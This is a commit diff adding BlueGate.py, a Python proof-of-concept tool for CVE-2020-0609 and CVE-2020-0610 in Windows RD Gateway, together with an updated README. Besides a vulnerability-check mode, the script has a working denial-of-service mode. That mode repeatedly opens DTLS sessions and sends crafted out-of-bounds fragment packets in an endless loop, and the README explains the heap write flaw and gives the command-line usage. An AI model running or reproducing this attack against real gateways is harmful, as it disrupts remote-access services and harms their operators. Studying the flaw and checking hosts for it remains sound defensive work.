Added Python3 PoC

BlueGate.py

@@ -0,0 +1,148 @@
+#!/bin/env python3
+from cryptography.hazmat.bindings.openssl.binding import Binding
+from OpenSSL import SSL
+import argparse
+import os
+import select
+import signal
+import socket
+import struct
+import sys
+
+TIMEOUT = 3
+
+def init_dtls():
+        binding = Binding()
+        binding.init_static_locks()
+        SSL.Context._methods[0]= getattr(binding.lib, "DTLSv1_client_method")
+
+def log_info(s):
+    print(f"\033[96m[*] {s}\033[0m")
+
+def log_success(s):
+    print(f"\033[92m[+] {s}\033[0m")
+
+def log_error(s):
+    print(f"\033[91m[-] {s}\033[0m")
+
+class Packet:
+    def __init__(self, fragment_id = 0, no_of_fragments = 1, fragment_length = 0, fragment = b""):
+        self.fragment_id     = fragment_id
+        self.no_of_fragments = no_of_fragments
+        self.fragment_length = fragment_length
+        self.fragment        = fragment
+        self.pkt_ID          = 5
+        self.pkt_Len         = 0
+
+    def update_pkt_Len(self):
+        self.pkt_Len = len(self.fragment) + 6
+
+    def __bytes__(self):
+        self.update_pkt_Len()
+
+        buf  = b""
+        buf += struct.pack("<HHHHH", 
+                            self.pkt_ID,
+                            self.pkt_Len,
+                            self.fragment_id, 
+                            self.no_of_fragments, 
+                            self.fragment_length)
+        buf += self.fragment
+
+        return buf
+
+class Connection:
+    def __init__(self, host = None, port = None, shouldConnect = True):
+        self.host          = host
+        self.port          = port
+        self.shouldConnect = shouldConnect
+
+        init_dtls()
+
+        signal.signal(signal.SIGALRM, self.broken_connection)
+
+        self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        self.connection = SSL.Connection(SSL.Context(0), self.socket)
+
+        if shouldConnect:
+            self.connect()
+
+    def broken_connection(self, signum, frame):
+        log_success("Connection not responding")
+        print(signum, frame)
+
+        try:
+            self.close()
+        except:
+            pass
+
+        sys.exit()
+
+    def connect(self):
+        signal.alarm(TIMEOUT)
+        try:
+            self.connection.connect((self.host, self.port))
+            self.connection.do_handshake()
+        except SSL.SysCallError:
+            log_error("Could not connect to RD Gateway")
+            sys.exit()
+        signal.alarm(0)
+
+    def send_dos_packet(self, id):
+        packet = Packet(
+            id, id, 1000, b"\x41"*1000
+        )
+        self.write(bytes(packet))
+
+    def is_vulnerable(self):
+        log_info(f"Checking if {self.host} is vulnerable...")
+
+        packet = Packet(
+            0, 65, 1, b"\x00"
+        )
+
+        self.write(bytes(packet))
+
+        ready = select.select([self.socket], [], [], TIMEOUT)
+        if ready[0]:
+            buf = self.read(16)
+            signal.alarm(0)
+            return not (0x8000ffff == struct.unpack('<L', buf[-4:])[0])
+
+        return True
+
+    def close(self):
+        self.connection.shutdown()
+
+    def write(self, buffer):
+        self.connection.send(buffer)
+
+    def read(self, size):
+        return self.connection.recv(1024)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-M", "--mode", choices=["check","dos"], required=True, type=str.lower, default=False, help="Mode")
+    parser.add_argument("-P","--port", default=3391, help="UDP port of RDG, default: 3391", required=False, type=int)
+    parser.add_argument("host", help="IP address of host")
+
+    args = parser.parse_args()
+
+    if args.mode == "check":
+        connection = Connection(args.host, args.port)
+        is_vulnerable = connection.is_vulnerable()
+
+        if is_vulnerable:
+            log_success("Host is vulnerable")
+        else:
+            log_error("Host is not vulnerable")
+
+    if args.mode == "dos":
+        log_info(f"Sending DoS packets to {args.host}...")
+
+        i = 0
+        while i > -1:
+            connection = Connection(args.host, args.port)
+            for n in range(4):
+                connection.send_dos_packet(i+n)
+            i += 1

README.md

@@ -1,27 +1,59 @@
-# BlueGate
-Proof of Concept (Denial of Service) for CVE-2020-0609 and CVE-2020-0610. 
+
+#  BlueGate
+
+Proof of Concept (Denial of Service) for CVE-2020-0609 and CVE-2020-0610.
+
+
 
 These vulnerabilities allows an unauthenticated attacker to gain remote code execution with highest privileges via RD Gateway for RDP.
 
+
+
 Please use for research and educational purpose only.
 
-## Usage
-You must have the OpenSSL libraries and headers installed. The default location in the project settings is `C:\Program Files\OpenSSL-Win64`. If you don't have Visual Studio, you should make some minor changes in datatypes and socket initialization. 
+
+
+##  Usage
+Make sure you have [pyOpenSSL](https://www.pyopenssl.org/en/stable/) installed for python3. 
+
+    usage: BlueGate.py [-h] -M {check,dos} [-P PORT] host
+
+    positional arguments:
+      host                  IP address of host
+
+    optional arguments:
+      -h, --help            show this help message and exit
+      -M {check,dos}, --mode {check,dos}
+                            Mode
+      -P PORT, --port PORT  UDP port of RDG, default: 3391
+
+
+
+##  Vulnerability
 
-## Vulnerability
-The vulnerabilities allows an unauthenticated attacker to write forward out-of-bound in the heap, by specifying an unchecked and arbitrary index parameter `(0x00 - 0xFFFF)`.  The data to write is also arbitrary with a length up to 1000 bytes at a time and a maximum of 4096 during one session.
+The vulnerabilities allows an unauthenticated attacker to write forward out-of-bound in the heap, by specifying an unchecked and arbitrary index parameter `(0x00 - 0xFFFF)`. The data to write is also arbitrary with a length up to 1000 bytes at a time and a maximum of 4096 during one session.
+
+
 
 If you would like to read more about the vulnerabilities, check [this](https://www.kryptoslogic.com/blog/2020/01/rdp-to-rce-when-fragmentation-goes-wrong/) or read my latest tweets on [Twitter](https://twitter.com/ollypwn) with a PoC video as well.
 
-## What is RD Gateway?
-RD Gateway acts as a proxy for RDP; i.e. between some internal servers and the internet, so you don't have to expose RDP directly to the internet. Inside `Release` you will find an already compiled executable. Note that as soon as the executable is running, it will connect to the server and start sending malicious packets, **so be careful**.
+
+
+##  What is RD Gateway?
 
-    .\BlueGate.exe <IP address>
+RD Gateway acts as a proxy for RDP; i.e. between some internal servers and the internet, so you don't have to expose RDP directly to the internet.
 
-## Why BlueGate?
+##  Why BlueGate?
+
+
 
 That was just the working title, and I couldn't come up with a better one at this stage.
 
-## Todo:
-- Vulnerability scanner/checker
-- Python implementation
+
+
+##  Todo:
+
+- ~~Vulnerability scanner/checker~~ **DONE**
+
+- ~~Python implementation~~ **DONE**
+

old/README.md

@@ -0,0 +1,27 @@
+# BlueGate
+Proof of Concept (Denial of Service) for CVE-2020-0609 and CVE-2020-0610. 
+
+These vulnerabilities allows an unauthenticated attacker to gain remote code execution with highest privileges via RD Gateway for RDP.
+
+Please use for research and educational purpose only.
+
+## Usage
+You must have the OpenSSL libraries and headers installed. The default location in the project settings is `C:\Program Files\OpenSSL-Win64`. If you don't have Visual Studio, you should make some minor changes in datatypes and socket initialization. 
+
+## Vulnerability
+The vulnerabilities allows an unauthenticated attacker to write forward out-of-bound in the heap, by specifying an unchecked and arbitrary index parameter `(0x00 - 0xFFFF)`.  The data to write is also arbitrary with a length up to 1000 bytes at a time and a maximum of 4096 during one session.
+
+If you would like to read more about the vulnerabilities, check [this](https://www.kryptoslogic.com/blog/2020/01/rdp-to-rce-when-fragmentation-goes-wrong/) or read my latest tweets on [Twitter](https://twitter.com/ollypwn) with a PoC video as well.
+
+## What is RD Gateway?
+RD Gateway acts as a proxy for RDP; i.e. between some internal servers and the internet, so you don't have to expose RDP directly to the internet. Inside `Release` you will find an already compiled executable. Note that as soon as the executable is running, it will connect to the server and start sending malicious packets, **so be careful**.
+
+    .\BlueGate.exe <IP address>
+
+## Why BlueGate?
+
+That was just the working title, and I couldn't come up with a better one at this stage.
+
+## Todo:
+- Vulnerability scanner/checker
+- Python implementation